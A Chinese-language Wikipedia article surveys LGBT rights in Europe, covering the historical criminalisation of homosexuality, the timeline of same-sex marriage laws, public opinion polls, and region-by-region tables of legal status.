跳转到内容

歐洲LGBT權益

本页使用了标题或全文手工转换
维基百科,自由的百科全书
欧洲的LGBT權益
欧洲
欧洲
同性性行為51个国家全部合法
6个地区全部合法
性別認同表達51个国家中39个合法
6个地区3个合法
同性伴侶關係51个国家中30个合法
6个地区全部合法
限制法規51个国家中13个国家宪法禁止同性婚姻
收養51个国家中22个同性伴侣收养合法
6个地区5个合法
兵役議題47个有军队的国家中39个允许公开服役
6个地区全部合法
反歧視保障51个国家中43个合法
6个地区全部合法
欧洲有关同性伴侣关系的法律¹
  婚姻
  民事结合
  有限国内承认(同居)
  有限国外承认(居留权)
  不承认
  宪法限定婚姻为异性夫妇
¹ 可能包含尚未生效的法律或法庭决议。

女同性戀者、男同性戀者、雙性戀者與跨性別者(LGBT)在歐洲的權益受到歐洲聯盟與多國法律的保障。全球36個承認同性婚姻的國家中,有21個在歐洲,同時英國皇家領地與丹麥屬地格陵蘭也已經先後通過同性婚姻法,另有10個歐洲國家和部份地區承認民事結合或透過其它形式承認同性結合。儘管歐洲自羅馬帝國後期開始有一段很長的同性戀迫害歷史,但自20世紀中葉以來,歐洲各國陸續保障LGBT權益,是各大洲中對LGBT人士最友善的一洲。

概述[编辑]

即便歐洲是對待LGBT人士相對友善的一洲,不少地區對於同性戀的看法依舊很保守,包括東歐巴爾幹部分國家;教廷俄羅斯和一些從前蘇聯獨立出來的共和國等地無法像西歐或北歐民眾那樣相對開放的對待同性戀人士,捷克匈牙利克羅埃西亞愛沙尼亞賽普勒斯斯洛維尼亞希臘是少數有制定法律保障同性戀權利的巴爾幹東歐國家,不過除希臘和賽普勒斯外,東歐國家不少是在共產党统治時期立法,而在共產党统治结束后,新的民主政府趨向保守,東歐各國對於同性戀權利並不如西歐北歐那般重視,同時近年來部分東歐國家對於LGBT的權益出現了衰退的現象,匈牙利克羅埃西亞近期都通過修憲不承認同性婚姻,波蘭俄羅斯立陶宛也通過法律禁止向未成年人宣導有關同性戀的任何訊息等同壓縮該國LGBT的權益。但也有例外,阿爾巴尼亞昔日共產時期進行、捍衛各種同性戀行為是屬於違法且需要監禁,不過民主化後新政府逐漸為LGBT權利制定多項法律保障,而現任阿爾巴尼亞總理埃迪·拉馬更表示支持LGBT權利,該國的年青人較其他年齡層為接納同性戀者。另一方面,在歐洲各國人數日漸眾多的穆斯林移民社群也幾乎非常排斥同性戀人士,成為另一問題。

歷史[编辑]

同性戀在古希臘羅馬帝國凱爾特人的社會中是很普遍的關係,但在羅馬帝國後期,基督教會成為國教後,歐洲才開始對同性戀的嚴厲禁止[1]。根據狄奧多西一世在390年頒布的詔令,同性戀男子應受到公眾的譴責;接著查士丁尼一世在529年編纂《查士丁尼法典》時,規定凡進行同性性行為者將被處以宮刑,無論主動方或被動方皆然。《查士丁尼法典》因此成為日後歐洲各國制定法律時的基礎,絕大多數的歐洲國家在將近1400年的時間中視同性戀者有「性悖軌罪」,可被判處死刑,數千名同性戀者因此遭到處決。女同性戀者較少遭到迫害,但也籠罩在法律陰影下。

波蘭皮亞斯特王朝在966年建國時並不認為同性戀為非法,並在1795年廢除性悖軌罪。在波蘭廢除性悖軌罪的40年後,俄羅斯帝國普魯士奧地利哈布斯堡王朝瓜分波蘭,直到第一次世界大戰結束的1918年,波蘭才重拾自己的法律與獨立地位。1932年,波蘭將同性戀與異性戀的同意年齡定為15歲。

法國法國大革命爆發後,國民議會在1791年重訂刑法典,消去所有關於同性戀的法律。拿破崙戰爭期間,所有被法軍征服的領土均被廢除視同性戀為非法的法令,例如當時的荷蘭日耳曼地區。但日耳曼地區在被普魯士統一後,普魯士對同性戀的懲罰相當嚴厲,這種現象一直持續到二戰,當時納粹德國對同性戀者展開迫害,維希法國也在1942年8月6日視同性戀為非法。在維希法國被推翻後,視同性戀為非法的法律依然持續將近40年,直到1982年才承認同性戀合法,並將同性戀者的同意年齡定為與異性戀相同的15歲。

然而,在社會保守氛圍下,男女同性戀者依然保持低調的生活,直到1969年,歐洲的同性戀者才在美國石牆暴動的鼓舞下起來爭取自身權益,發起一連串社會權利運動。

許多20世紀的獨裁政權極端反對同性戀,例如納粹德國佛朗哥政權。相較之下,波蘭在1918年獨立後,在1932年就成為歐洲第一個促使同性戀非刑事化的國家,其次是丹麥1933年、冰島1940年、瑞士1942年與瑞典1944年。

1979年,一些同性戀權益運動人士刻意以「得了同性戀病」打電話向上司請假,藉此表達將同性戀視為精神疾病的抗議。部份激進份子更佔領瑞典國家衛生與福利部的辦公大樓,迫使瑞典在數月後不再將同性戀視為精神疾病,成為第一個不再視同性戀為疾病的國家;1989年,丹麥成為世界第一個允許民事結合的國家;荷蘭則在2001年成為第一個允許同性婚姻的國家,之後不少國家允許民事結合,而比利時2003年西班牙2005年[2]、挪威和瑞典2009年、葡萄牙和冰島2010年、丹麥2012年、法國、英格蘭和威爾斯2013年、蘇格蘭、盧森堡和芬蘭2014年、格陵蘭2015年、德國和馬爾他2017年、奧地利2019年、北愛爾蘭2020年、斯洛維尼亞2022年、安道爾2023年、愛沙尼亞2024年在國會通過同性婚姻合法化,另外愛爾蘭2015年和瑞士2021年全民公投通過同性婚姻合法化。

2009年10月22日,瑞典教會召開大會,宣布對同性配偶致上誠摯的祝福,並同意牧師在同性婚禮上使用「婚配」二字,是全球第一個承認同性婚姻的主流基督教會[3]

近代發展[编辑]

原先在2015年3月4日通過同性婚姻法案的斯洛維尼亞,在2015年12月20日進行公投,結果反對高達63%,同性婚姻法案遭到推翻。但在2022年7月8日,斯洛維尼亞憲法法庭以6票贊成3票反對做出判決:基於憲法上不得存有歧視的原則,同性伴侶的婚姻權應比照異性伴侶婚姻制度,使斯洛維尼亞成為第十八個全國性給予同性註冊結婚的歐洲國家。

安道爾2022年7月21日,總委員會以18-6票通過同性婚姻,後由兩位大公之一的法國總統正式簽署日起的6個月後生效。

愛沙尼亞 2023年6月20日, 於國會通過同性婚姻合法化,其後總統正式簽署生效,2024年1月1日開始實施。 愛沙尼亞成為第一個同婚合法的前蘇聯加盟共和國

希臘 2024年1月15日, 於議會通過同性婚姻合法化並正式生效。

除了白俄羅斯賽普勒斯拉脫維亞塞爾維亞希臘土耳其外,其它歐洲國家都允許同性戀者在軍中公開身份服役。希臘和直布羅陀是歐洲目前唯二對同性戀者有較高同意年齡的地區,其它歐洲諸國皆給予同性戀者平等的同意年齡。

輿論反應[编辑]

2015年欧洲调查:每个国家“完全同意”或“倾向于同意”“LGBT人群应该拥有与异性恋者相同的权利。”的人数百分比 [4]
国家 百分比
 荷蘭 96%
 瑞典 95%
 丹麦 90%
 西班牙 90%
 愛爾蘭 87%
 英国 84%
 法國 81%
 比利时 81%
 馬爾他 77%
 盧森堡 75%
 芬兰 74%
 義大利 72%
 葡萄牙 71%
 德国 70%
 奥地利 70%
 賽普勒斯 62%
 捷克 62%
 希腊 62%
 斯洛維尼亞 54%
 保加利亚 51%
 匈牙利 49%
 克罗地亚 48%
 爱沙尼亚 48%
 立陶宛 44%
 拉脫維亞 42%
 波蘭 37%
 羅馬尼亞 36%
 斯洛伐克 36%
歐洲各國的同性領養合法性地圖
  同性領養合法
  僅允許收養繼子
  同性領養非法
  未知

2002年,皮尤研究中心做的一項全球態度統計表示,多數西歐國家認為同性戀應被社會接納,而多數俄羅斯人、烏克蘭人與波蘭人則表示反對[5]。在2006年的歐盟民意調查中,歐盟對當時的27個成員國進行同性婚姻的輿論調查,包括荷蘭(82%)、瑞典(71%)、丹麥(69%)、比利時(62%)、盧森堡(58%)、西班牙(56%)、德國(52%)、捷克(52%)均表示支持,而支持率低於50%的則有馬耳他(18%)、匈牙利(18%)、波蘭(17%)、立陶宛(17%)、希臘(15%)、保加利亞(15%)、賽普勒斯(14%)、拉脫維亞(11%)與羅馬尼亞(11%)等國[6]。而在同性領養議題上,荷蘭和瑞典各有69%、51%的支持率,最不支持的波蘭與馬耳他則只有7%[6]

2008年10月的另一項調查顯示,55%的英國人支持同性婚姻,其它民意調查也顯示愛爾蘭民眾與民間團體對同性收養的支持率為51%與50%[7][8];法國對同性婚姻有61%的支持率,但俄羅斯則只有14%[9][10];義大利民眾對《民事同性伴侶法》有45%與47%的支持率和反對率,2009年對義大利民間團體做的調查中,有40.4%支持同性婚姻[11]。據歐洲蓋洛普民意測驗分析:婦女、年輕族群與受過高等教育者支持同性婚姻與同性領養的比例均較高。

关于同性收养的民意调查
国家 调查机构 年份 支持 反对 不知道/中立/没有答案/其他
 奥地利 IMAS 2015 46%[12] 48%[12] 6%
 比利时 Ipsos 2013 67%[13] 33%[13] 0%[13]
 保加利亚 Eurobarometer 2006 12%[14] 68%[14] 20%[14]
 賽普勒斯 Eurobarometer 2006 10%[14] 86%[14] 4%[14]
 捷克 Median 2018 61%[15] 31%[15] 8%[15]
 丹麦 Pew Research Center 2017 75%[16] - -
 爱沙尼亚 ASi 2012 26%[17] 66%[17] 8%[17]
 芬兰 Taloustutkimus 2013 51%[18] 42%[18] 7%[18]
 法國 Pew Research Center 2017 64%[16] - -
 德国 Pew Research Center 2017 67%[16] - -
 希腊 DiaNeosis 2017 26%[19] 72%[19] 2%[19]
 匈牙利 Eurobarometer 2006 13%[14] 81%[14] 6%[14]
 愛爾蘭 Red C Poll 2011 60%[20] - -
 義大利 Pew Research Center 2017 42%[16] - -
 拉脫維亞 Eurobarometer 2006 8%[14] 89%[14] 3%[14]
 立陶宛 Eurobarometer 2006 12%[14] 82%[14] 6%[14]
 盧森堡 Politmonitor 2013 55%[21] 44%[21] 1%[21]
 馬爾他 Misco 2014 20%[22] 80% -
 荷蘭 Pew Research Center 2017 86%[16] - -
 挪威 YouGov 2012 54% 34% 12%
 波蘭 Ipsos 2017 16%[23] 80%[23] 4%[23]
 葡萄牙 Pew Research Center 2017 59%[24] 28%[24] 13%[24]
 羅馬尼亞 Eurobarometer 2006 8%[14] 82%[14] 10%[14]
 俄羅斯 VTsIOM 2015 3%[25] 88% 9%
 塞爾維亞 GSA 2010 8%[26] 79% 13%
 斯洛伐克 Eurobarometer 2006 12%[14] 84%[14] 4%[14]
 斯洛維尼亞 Delo Stik 2015 38%[27] 55%[27] 7%[27]
 西班牙 Pew Research Center 2017 81%[16] - -
 瑞典 Pew Research Center 2017 80%[16] - -
 瑞士 Pink Cross 2016 50%[28] 39%[28] 11%[28]
 烏克蘭 Gay Alliance of Ukraine 2013 7%[29] 68%[29] 12%
13%允许一些例外[29]
 英国 Pew Research Center 2017 73%[16] - -

歐盟會員國間的LGBT權益[编辑]

至2024年為止,歐盟目前各有28個會員國,目前各會員國之間對LGBT權益保障差益極大,沒有統一性的立法來保障其權益,目前同性婚姻合法的歐盟國家有西班牙葡萄牙法國荷蘭比利時盧森堡丹麥瑞典芬蘭愛爾蘭德國馬爾他奧地利斯洛維尼亞愛沙尼亞希臘,制定同性伴侶法的歐盟國家則有捷克賽普勒斯(不包括北賽普勒斯)、義大利,尚未制定任何法律保障LGBT權益的則有羅馬尼亞,有制定同性伴侶法卻限縮婚姻權利的則有匈牙利克羅埃西亞拉脫維亞三國,國家憲法禁止同性婚的目前則有立陶宛保加利亞斯洛伐克波蘭

歐洲LGBT權益一覽表[编辑]


欧盟[编辑]

國家 / 地區 同性性行為 同性伴侶關係 同性婚姻 同性領養 在軍隊公開出櫃? 反歧視法 (性傾向) 性別認同 / 表達
相關法律
欧洲联盟歐盟 是 在所有27个成员国合法[30] 是/否 27个成员国中有22个國家予以保障
是/否 27个成员国中有15个國家予以保障
是/否 继親收养在27个成员国中有18个國家予以保障
共同收养在27个成员国中有13國家予以保障
是 在所有27个成员国合法
是 所有成员国皆禁止就业方面的歧视,27个成员国中25个禁止所有類型的歧視 是/否 27个成员国中賽普勒斯匈牙利除外的25个國家皆允許性別登記的變更[31]

北歐[编辑]

國家 / 地區 同性性行為 同性伴侶關係 同性婚姻 同性領養 在軍隊公開出櫃? 反歧視法 (性傾向) 性別認同 / 表達
相關法律
丹麦 丹麥
(歐盟的成員國)
是合法(自1933年)
+簽署聯合國宣言[32]
是 合法(自1989年至2012年,既存伴侶關係仍然有效)[33] 是 合法(自2012年)[34][35] 是 继親收养(自1999年)共同收养(自2010年)[36] 是(自1978年) 是 禁止所有類型的歧视[37][38] 是 法律允許變更性别(自1929年),法律性别变更和识别可无需手术或激素治疗(自2014年)[39];法律承認第三性別:X(自2014年)
爱沙尼亚 愛沙尼亞
(歐盟的成員國)
是 合法(自1992年)
+簽署聯合國宣言[32]
是 合法(自2016年)[40] 是 合法(自2023年) 是(自2024年) 是 是 禁止所有類型的歧视[38] 是 法律允許變更性别(自2002年),法律性别变更和识别可无需手术[41]
法罗群岛 法羅群島
(丹麥王國的構成國
是 合法(自1933年)[32] 是(自2017年) 是(自2017年) 是(自2017年) 是 (由丹麥軍隊負責防禦) 是 禁止一些類型的歧視[38][42] 否 審議中 [43]
芬兰 芬蘭
(包括 奥兰群島自治區)
(歐盟的成員國)
是 合法(自1971年)
+簽署聯合國宣言[32]
是 合法(自2002年至2017年,既存伴侶關係仍然有效)[44] 是 合法(自2017年3月)[45][46] 是 继親收养(自2009年)共同收养(自2017年3月) 是 是 禁止所有類型的歧视[38] 是 變更性別需要性別重置手術[47]
冰岛 冰島 是 合法(自1940年,作为丹麦的一部分)
+簽署聯合國宣言[32]
是 合法(注册同居自2006年[48],注册伴侣自1996至2010年,既存伴侶關係仍然有效)[49] 是 合法(自2010年)[50][51] 是 合法(自2006年)[52] 没有军队 是 禁止所有類型的歧视[38] 是 法律性别变更可无需手术[53][41] ;法律承認第三性別:X(自2020年)
拉脫維亞 拉脫維亞
(歐盟的成員國)
是 合法(自1992年)
+簽署聯合國宣言[32]
是合法(自2024年7月) 否 憲法禁止(自2006年)[54] 否 僅限單身名義收養[55] 是 是 禁止一些類型的歧視[38] 是 法律允許變更性别[56]
立陶宛 立陶宛
(歐盟的成員國)
是 合法(自1993年)
+簽署聯合國宣言[32]
否 (待定)[57] 否 憲法禁止(自1992年)[58] 否 [59] 是 是 禁止所有類型的歧视[38] 是 法律允許變更性别(自2003年)[60]
挪威 挪威 是 合法(自1972年)
+簽署聯合國宣言[32]
是 合法(注册伴侣自1993至2009年,既存伴侶關係仍然有效)[61] 是 合法(自2009年)[62][63] 是 合法(自2009年)[64] 是 是 禁止所有類型的歧视[38] 是 法律性别变更可无需手术(自2016年) [41]
瑞典 瑞典
(歐盟的成員國)
是 合法(自1944年)
+簽署聯合國宣言[32]
是 合法(注册伴侣自1995年至2009年,既存伴侶關係仍然有效)[65] 是 合法(自2009年)[66] 是 合法(自2003年)[67] 是 是 禁止所有類型的歧视[38] 是 法律允許變更性别(自1972年),性别登記变更无需手术(自2013年)[68]

西歐[编辑]

國家 / 地區 同性性行為 同性伴侶關係 同性婚姻 同性領養 在軍隊公開出櫃? 反歧視法 (性傾向) 性別認同 / 表達
相關法律
比利时 比利時
(歐盟的成員國)
是 合法(自1795年,作为法国的一部分,1944年到1945年被納粹德國吞并期间违法)
+簽署聯合國宣言[32]
是 合法(自2000年)[69] 是 合法(自2003年)[70][71][72] 是 合法(自2006年)[73] 是 是 禁止所有類型的歧視[38] 是 法律允許變更性別(自2007年),變更性別毋需手術(自2018年)[74]
法國 法國
(歐盟的成員國)
是 合法(自1791年後合法,1940年-1945年納粹佔領區違法)
+簽署聯合國宣言[32]
是 《民事結合法》(自1999年)[75] 是 合法(自2013年)[76] 是 合法(自2013年)[77] 是 是 禁止所有類型的歧視[32][38] 是 變更性別毋需手術(自2017年)[78]
英国根西行政區
英國皇家屬地之一):
根西 根西
 奧爾德尼
 薩克
是 合法(自1983年)[79][80][32] 是 承認英國的民事結合關係(自2012年) [81] 是 根西島(2017),奧爾德尼島(2018),薩克島(2020)[81] 是 (自2017年) 是 英軍負責防務 是 禁止所有類型的歧視(自2004年)[82] 是 2004年反歧视法。只有判例法:自2007年起法律性别可变更。只允许发布新的出生证明,不修改或删除现有出生证[82][83]
爱尔兰 愛爾蘭
(歐盟的成員國)
是 男性合法(自1993年),女性一直合法
+簽署聯合國宣言[32]
是 合法(自2011年至2015年,既存伴侶關係仍然有效)[84] 是 修憲公投通過(自2015年)[85] 是 合法(自2017年)[86] 是 是 禁止所有類型的歧視[87][88][89] 是 根據2015年性别承认法,變更性別毋需手術[90]
曼島 曼島
英國皇家屬地之一)
是 合法(自1992年)[32] 是 伴侶關係(自2011年)[91] 是 (自2016年) 是 合法(自2011年) 是 英軍負責防務 是 禁止所有類型的歧視(自2019年)[92] 是 《2009年性別認同法案》保障變更性別的權利[93][94]
澤西 澤西島
英國皇家屬地之一)
是 合法(自1990年)[32] 是 民事伴侣关系(自2012年)[95] 是 (自2018年) 是 合法(自2012年) 是 英軍負責防務 是 禁止所有類型的歧視(自2015年)[96] 是 《2010年澤西島性別認同法案》保障變更性別的權利[97]
卢森堡 卢森堡
(歐盟的成員國)
是 合法(自1795年,作为法国的一部分,1942年到1945年被納粹德國吞并期间违法)
+簽署聯合國宣言[32]
是 合法(自2004年)[98] 是 合法(自2015年)[99][100] 是 合法(自2015年)[101] 是 是 禁止所有類型的歧視[102] 是 變更性別毋需手術(自2018年)[41]
摩纳哥 摩纳哥 是 合法(自1793年,作为法国的一部分)
+簽署聯合國宣言[32]
是 合法(自2020年6月) 否 否 是 法軍負責防務 是 禁止一些類型的歧視[103] 未知
荷兰 荷蘭
(歐盟的成員國)
是 合法(自1811年,作为法国的一部分,1940年到1945年被納粹德國吞并期间违法)
+簽署聯合國宣言[32]
是 合法(自1998年)[104] 是 合法(自2001年)[105],世界第一個允許同性婚姻的國家。 是 合法(自2001年)[106] 是 是 禁止所有類型的歧視[38][107] 是 變更性別毋需手術(自2014年) [108]
英国 英國
(2020年1月31日脫離歐盟)
是 男性合法(英格兰威爾斯自1967年、蘇格蘭自1981年、北爱尔兰自1982年),女性則一直合法
+簽署聯合國宣言[32]
是 民事結合(自2005年)[109] 是合法(自2014年,於英格兰威爾斯蘇格蘭[110][111],2020年於北爱尔兰 是 合法(英格兰威爾斯自2005年、蘇格蘭自2009年、北爱尔兰自2013年)[112][113] 是 (自2000年) 是 禁止所有類型的歧視 [114][32] 是 《2004年性別認同法案》保障變更性別的權利

中歐[编辑]

國家 / 地區 同性性行為 同性伴侶關係 同性婚姻 同性領養 在軍隊公開出櫃? 反歧視法 (性傾向) 性別認同 / 表達
相關法律
奥地利 奥地利
(歐盟的成員國)
是 合法(自1971年)
+簽署聯合國宣言[32]
是 伴侶登記(自2010年)[115] 是(自2019年)[116] 是继親收养(自2013年);共同收养(自2016年1月)[117][118] 是 是 禁止所有類型的歧视[38] 是變更性別毋需手術 [41]
捷克 捷克
(歐盟的成員國)
是 合法(自1962年,捷克斯洛伐克社会主义共和国時期)
+簽署聯合國宣言[32]
是 伴侶登記(自2006年)[119] 否 審議中 否 僅限單身名義收養(继親收养審議中)[120] 是 是 禁止所有類型的歧视[38] 是 法律允許公民於施行变性手术後修改出生证明性別欄[41]
德国 德國
(歐盟的成員國)
是 合法
東德(自1968年)
西柏林西德(自1969年)+簽署聯合國宣言[32][121]
是 生活伴侶登記(自2001年至2017年,既存伴侶關係仍然有效)[122] 是 合法(自2017年)[123] 是 合法(自2017年) 是 (自2000年) 是 禁止所有類型的歧视[124][125] 是 法律允許性别变更(自1980年),毋需手術變更性別(自2011年)[126]
匈牙利 匈牙利
(歐盟的成員國)
是 合法(自1962年)
+簽署聯合國宣言[32]
是 伴侶登記(自2009年)[127] 否 憲法禁止(自2012年)[128][129] 否 僅限單身名義收養 是 是 禁止所有類型的歧视[38] 否 (禁止變更法律性别,自2020年)
列支敦斯登 列支敦斯登 是 合法(自1989年)
+簽署聯合國宣言[32]
是 伴侶登記(自2011年)[130] 否 否 僅限單身名義收養 [131] 没有军队 是 禁止所有類型的歧视 否(無法變更法律性别)[41]
波兰 波兰
(歐盟的成員國)
是 合法(自1932年)+簽署聯合國宣言[32] 是 承認非常有限的同居權利(自2012年),伴侶登記審議中[132] 否 憲法禁止(自1997年),宣稱婚姻是「男性與女性的結合」[133][134] 否 僅限單身名義收養[135] 是 是 禁止就業歧視 [38] 是 允許變更性別(需要性別重置手術),且允許證件或戶政上的性別更動
斯洛伐克 斯洛伐克
(歐盟的成員國)
是 合法(自1962年,捷克斯洛伐克社会主义共和国時期)
+簽署聯合國宣言[32]
否 否 憲法禁止(自2014年)[136] 否 僅限單身名義收養 [137] 是 是 禁止所有類型的歧视[138][139] 是 法律允許變更性別[41]
瑞士 瑞士 是 合法(邦聯政府自1942年;日內瓦州沃州瓦莱州提契諾州自1798年,法兰西第一共和国行省時期)+簽署聯合國宣言[32] 是 伴侶登記(自2007年)[140] 是(自2021年)[141] 是 继親收养(自2018年)[142];共同收養(自2021年)[141] 是 是 禁止所有類型的歧视 [143] 是 變性後可更改法律文件上的性別欄[144]

東歐[编辑]

國家 / 地區 同性性行為 同性伴侶關係 同性婚姻 同性領養 在軍隊公開出櫃? 反歧視法 (性傾向) 性別認同 / 表達
相關法律
白俄罗斯 白俄罗斯 是 合法(自1994年)[32] 否 否 宪法禁止(自1994年)[145] 否 否/是 在和平时期同性恋者禁止服兵役,但在战时被部分允许[146] 否 LGBT權利的抗爭行动/表达被禁止[147] 是[148]
摩尔多瓦 摩尔多瓦 是 合法(自1995年)+簽署聯合國宣言[32] 否 否 憲法禁止(自1994年)[149] 否 是 是 禁止一些類型的歧視[38] 是 毋需手術變更性別(自2017年) [41]
羅馬尼亞 羅馬尼亞
(歐盟的成員國)
是 合法(自1996年)
+簽署聯合國宣言[32]
否 (待定)[150][151] 否 否 僅限單身名義收養 [152] 是 是 禁止所有類型的歧视[38] 是 法律允許公民於施行變性手術後修改出生證明性別欄[41]
俄罗斯 俄羅斯歐俄地區 是 合法(男性自1993年,女性一直合法)[153][32]否 车臣共和国境內傳出追捕監禁LGBT的迫害事件[154] 否 否 憲法禁止(自2020年) 否 否 可服役,但有非正式的「不问,不说」政策(自2003年) 否 LGBT權利的抗爭行动/表达被禁止 否 2023年7月,俄罗斯国家杜马通过一项法案,禁止职业医师从事性别重置手术,禁止民众更改官方身份文件上的性别(自2023年)[155]
德涅斯特河沿岸 德涅斯特河沿岸(有限承認的國家,高度依賴俄羅斯) 是 合法(自2002年)[156] 否 否 否 未知 否[157] 未知
乌克兰 乌克兰 是 合法(自1991年)+簽署聯合國宣言[32] 否 否 憲法禁止(自1996年)[158] 否 僅限單身名義收養 [159] 否/是 政策取决于区域专员[160] 是 禁止一些類型的歧視 是法律允許變更性別(自1992年),變更性別手術非必要(自2016年)[41]

南歐[编辑]

國家 / 地區 同性性行為 同性伴侶關係 同性婚姻 同性領養 在軍隊公開出櫃? 反歧視法 (性傾向) 性別認同 / 表達
相關法律
阿尔巴尼亚 阿尔巴尼亚 是 合法(自1995年)
+簽署聯合國宣言[32]
否 否 否 是 是 禁止所有類型的歧視[161][38] 否 (無法變更法律性別)
安道尔 安道爾 是 合法(自1990年)
+簽署聯合國宣言[32]
是 合法(自2005年)[162]民事结合(自2014年)[23] 是 合法(自2022年) 是 合法(自2014年)[163][23][164] 没有军队 是 禁止所有類型的歧視[38] 否 (無法變更法律性別)[41]
波斯尼亚和黑塞哥维那 波斯尼亚和黑塞哥维那 是 合法
波士尼亞與赫塞哥維納聯邦(自1996年)塞族共和國(自1998年)布爾奇科特區(自2003年)
+簽署聯合國宣言[32]
否 審議中 否 否 是 是 禁止所有類型的歧視[38] 是 允許施行變性手術後修改出生證明性別欄
保加利亚 保加利亞
(歐盟的成員國)
是 合法(自1968年)
+簽署聯合國宣言[32]
否 否 憲法禁止(自1991年)[165] 否 僅限單身名義收養 [166] 是 是 禁止所有類型的歧視[38] 是 允許施行變性手術後修改出生證明性別欄[167][168]
克罗地亚 克羅埃西亞
(歐盟的成員國)
是 合法(自1977年,南斯拉夫社会主义联邦共和国時期)
+簽署聯合國宣言[32]
是 生活伴侶登記(自2014年)[169] 否 憲法禁止(自2013年)[170] 是/否 已登記生活伴侶有监护权(自2014年) 是 是 禁止所有類型的歧视[171][38] 是《反歧視法》、《志願服務法》禁止基于所有類型的性别歧视,但性别变更仍由卫生部颁发的特殊政策控制[172]
賽普勒斯 賽普勒斯英语LGBT rights in Cyprus
(歐盟的成員國)
是 合法(自1998年)
+簽署聯合國宣言[32]
是 合法(自2015年11月26日通過法案) 否 否 是 是 禁止所有類型的歧視[38] 否 (無法變更法律性別)
北賽普勒斯 北賽普勒斯
(有限承認的國家,高度依賴土耳其
是 合法(自2014年)[173][174][32] 否 否 否 否 是 禁止所有類型的歧視[173][174] 未知
亞克羅提利與德凱利亞 阿克罗蒂里和泽凯利亚
(英国的主权基地区)
Yes 自2000起
+ 签署联合国家宣言[175]
Yes 自2005起 Yes自2014起(仅限驻军及其近亲)
否(其他居民)
Yes 英国负责防务 Yes 禁止一些类型歧视[176]
直布罗陀 直布罗陀
英國海外領土
是 合法(自1993年) [32] 是 民事结合(自2014年)[177] 是(自2016年) 是 合法(自2014年) 是 (由英國軍隊負責防禦) 是 禁止所有類型的歧視(自2013年)[178] 否 (無法變更法律性別);法律允許待定[179]
希腊 希腊
(歐盟的成員國)
是 合法(自1951年)
+簽署聯合國宣言[32]
是 合法(自2015年) 是 合法(自2024年2月15日通過法案) 是 合法(自2024年2月15日通過法案) 是 (自2002年) 是 禁止所有類型的歧視[38] 是 法律允許變更性別(自2010年),毋需手術變更性別(自2017年)[41]
義大利 義大利
(歐盟的成員國)
是 合法(自1890年;弗留利-威尼斯朱利亚特伦蒂诺-上阿迪杰自1919年;1943年到1945年弗留利-威尼斯朱利亚的一部分、威尼托的一部分和特伦蒂诺-上阿迪杰納粹德國吞并时违法)
+簽署聯合國宣言[32]
是 合法(自2016年) 否(待定)[180][181][182] 是 法院承認繼親收養(自2016年) 是 是 禁止一些類型的歧視[38] 是 允許變性,且允許證件或戶政上的性別更動(自1982年)[183]最高上诉法院在2015年决定,手術非必要[184]
科索沃 科索沃(有限承認的國家) 是 合法(作为奥斯曼帝国一部分自1858年;作为塞爾維亞與蒙特內哥羅一部分自1994年)[32] 否 否[185] 否 僅限單身名義收養[186][187] 是 是 禁止所有類型的歧視[38][188] 否(無法變更法律性別)[41]
马耳他 马耳他
(歐盟的成員國)
是 合法(自1973年)
+簽署聯合國宣言[32]
是 合法(自2014年)[189] 是 合法(自2017年)[189][190] 是 合法(自2014年) 是 是 禁止所有類型的歧視[38] 是 毋需手術變更性別(自2015年)[191];法律承認第三性別:X(自2017年)
蒙特內哥羅 蒙特內哥羅 是 合法(自1977年,作为南斯拉夫社会主义联邦共和国的一部分)
+簽署聯合國宣言[32]
是 (自2020年) 否 憲法禁止(自2007年)[192][193] 否 是 是 禁止所有類型的歧視[194][38] 是 允許施行變性手術後修改出生證明性別欄[41]
北馬其頓 北馬其頓 是 合法(自1996年)
+簽署聯合國宣言[32]
否 否 否 是 是 禁止所有類型的歧視 否 (無法變更法律性別)
葡萄牙 葡萄牙
(歐盟的成員國)
是 合法(自1982年,曾在1852-1886年間合法)
+簽署聯合國宣言[32]
是 事實上結合(自2001年)[195][196] 是 合法(自2010年)[197] 是 自2016年 是 是 禁止所有類型的歧視[38] 是 所有文件都可以变更性别(自2011年),法律性別變更和識別可無需手術或激素治療(自2018年)[198][199]
圣马力诺 圣马力诺 是 合法(自1865年)
+簽署聯合國宣言[32]
是 合法(自2019年) 否 否/是 繼親收養(自2019年) 未知 是 禁止所有類型的歧視 [200] 否 (無法變更法律性別)[41]
塞尔维亚 塞尔维亚 是 合法(作为奥斯曼帝国的一部分自1860年[201];作为南斯拉夫社会主义联邦共和国的一部分自1994年)
+簽署聯合國宣言[32]
否 否 宣稱婚姻是「男性與女性的結合」,憲法禁止(自2006年)[202] 否 是 是 禁止所有類型的歧視 [38] 是 法律允許性别变更(自2007年)[203][204],法律性別變更和識別可無需手術或激素治療(自2019年)
斯洛文尼亚 斯洛文尼亚
(歐盟的成員國)
是 合法(自1977年,南斯拉夫社会主义联邦共和国時期)
+簽署聯合國宣言[32]
是 承認非常有限的同居權利(自2006年),伴侶登記(自2017年)[205] 是 合法(自2022年) 是 继親收养(自2011年)共同收養(自2022年) 是 是 禁止所有類型的歧视 [38] 是 證件與戶政上的性別可登記為中性,並可按變性後的性別重新登記[206][207]
西班牙 西班牙
(歐盟的成員國)
是 合法(自1979年)
+簽署聯合國宣言[32]
是 事實上結合(自1998年至2018年)[208][209] 是 合法(自2005年)[210] 是 合法(自2005年)[211] 是 是 禁止所有類型的歧視[38] 是 《性別認同法》(自2007年)保障變更性別的權利[212]
梵蒂冈 梵蒂冈 是 合法(自1890年,作为意大利王國的一部分)[32] 否 否 否 没有军队 否 否


參見[编辑]

注釋[编辑]

參考文獻[编辑]

 1. ^ 矛鋒. 同性戀美學. 台北: 揚智文化. 1996年7月. ISBN 957-9272-63-8 (中文(臺灣)). 
 2. ^ Spain approves liberal gay marriage law. 《聖彼得堡時報》. 2005年7月1日 [2007-01-08]. (原始内容存档于2016-03-03) (英语). 
 3. ^ Sweden church allows gay weddings . 英國廣播公司. [2010-10-18]. (原始内容存档于2021-03-30) (英语). 
 4. ^ ILGA-Europe Annual Review of the Human Rights Situation of Lesbian, Gay, Bisexual, Trans and Intersex People in Europe (PDF). ILGA, Europe. May 2016 [2016-10-29]. (原始内容存档 (PDF)于2018-10-08). 
 5. ^ Views of a Changing World 2003. 佩尤研究中心. [2007-01-29]. (原始内容存档于2008-05-03) (英语). 
 6. ^ 6.0 6.1 Eight EU Countries Back Same-Sex Marriage. Angus Reid Global Monitor : Polls & Research. [2006-01-29]. (原始内容存档于2008-09-05) (英语). 
 7. ^ Sex uncovered poll: Homosexuality. 《衛報》 (倫敦). 2008-10-26 [2010-10-19]. (原始内容存档于2010-05-29) (英语). 
